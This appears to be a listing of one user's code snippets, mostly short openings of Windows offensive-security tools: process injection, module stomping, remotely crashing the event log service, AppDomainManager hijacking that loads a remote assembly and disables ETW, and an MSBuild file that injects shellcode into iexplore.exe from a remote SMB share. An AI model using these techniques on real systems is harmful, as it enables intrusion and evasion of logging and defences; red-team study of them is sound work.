slyd0g

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;

namespace ModuleStomp
{
    class Program
    {
        static string ModuleName = @"xpsservices.dll";

slyd0g

using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;

namespace DinjectorWithQUserAPC
{


    public class Program

slyd0g

# Crash the Windows Event Log Service remotely, needs Admin privs
# originally discovered by limbenjamin and accidently re-discovered by @byt3bl33d3r
#
# Once the service crashes 3 times it will not restart for 24 hours
#
# https://github.com/limbenjamin/LogServiceCrash
# https://limbenjamin.com/articles/crash-windows-event-logging-service.html
#
# Needs the impacket library (https://github.com/SecureAuthCorp/impacket)

slyd0g

This is a variation of the technique originally discovered by subtee and described here

TL;DR It essentially allows you to turn any .NET application into a lolbin by providing a configuration file and specifying the <appDomainManagerAssembly> element pointing to a specially crafted .NET assembly which executes when the application is loaded.

This variation allows you to load the AppDomainManager assembly from a UNC path or HTTP(s) server. Also disables ETW thanks to the <etwEnable> element :)

1. Copy some binary you love to say, C:\Test. Lets use aspnet_compiler.exe as an example
2. Compile test.cs to test.dll with a signed strong name, this is required to load an assembly outside of a .NET applications base directory.
3. Host test.dll on a remote SMB or HTTP(S) server

slyd0g

#!/usr/bin/env python3
'''Converts videos to formats acceptable my iMovie.'''

import argparse
import os
from pathlib import Path

import cv2
import moviepy.editor as mp

slyd0g

--------------------------------------------------------------------------------
<WinProcess "smss.exe" pid 520 at 0x5db0c50L>
64
[!!] Invalid rpcrt4 base: 0x0 vs 0x7ff868230000
--------------------------------------------------------------------------------
<WinProcess "csrss.exe" pid 776 at 0x5db0908L>
64

Interfaces :
Endpoints :

slyd0g

#include "stdafx.h"

int main()
{
	ICLRMetaHost *metaHost = NULL;
	IEnumUnknown *runtime = NULL;
	ICLRRuntimeInfo *runtimeInfo = NULL;
	ICLRRuntimeHost *runtimeHost = NULL;
	IUnknown *enumRuntime = NULL;
	LPWSTR frameworkName = NULL;

slyd0g

#Get-PotentialDLLHijack -CSVPath .\Logfile.CSV -MaliciousDLLPath .\DLLHijackTest.dll -ProcessPath "C:\Users\John\AppData\Local\Programs\Microsoft VS Code\Code.exe"
function Get-PotentialDLLHijack {
    param (
        [String]
        $CSVPath = "",
        [String]
        $MaliciousDLLPath = "",
        [String]
        $ProcessPath = "",
        [String]

slyd0g

https://stackoverflow.com/questions/32787502/put-bytes-from-unsigned-char-array-to-stdstring-using-memcpy-function

unsigned char* firstMessage = new unsigned char[firstMessageSize](); //this will initialize on the heap, clean 0'd out

# string to unsigned char *, .c_str() to convert to signed char * then cast
std::string firstMessage = payloadUUID + stringIV + ciphertext + mac;
unsigned char* ucharFirstMessage = (unsigned char*)firstMessage.c_str();

slyd0g

<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
            <Target Name="MyTarget">
                <SimpleTask MyProperty="My voice is my passport."
                MyCode='<base64 encoded x64 shellcode>'
		MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/>
            </Target>
        <UsingTask TaskName="SimpleTask" AssemblyFile="\\192.168.120.129\share\IEShims.dll" />
</Project>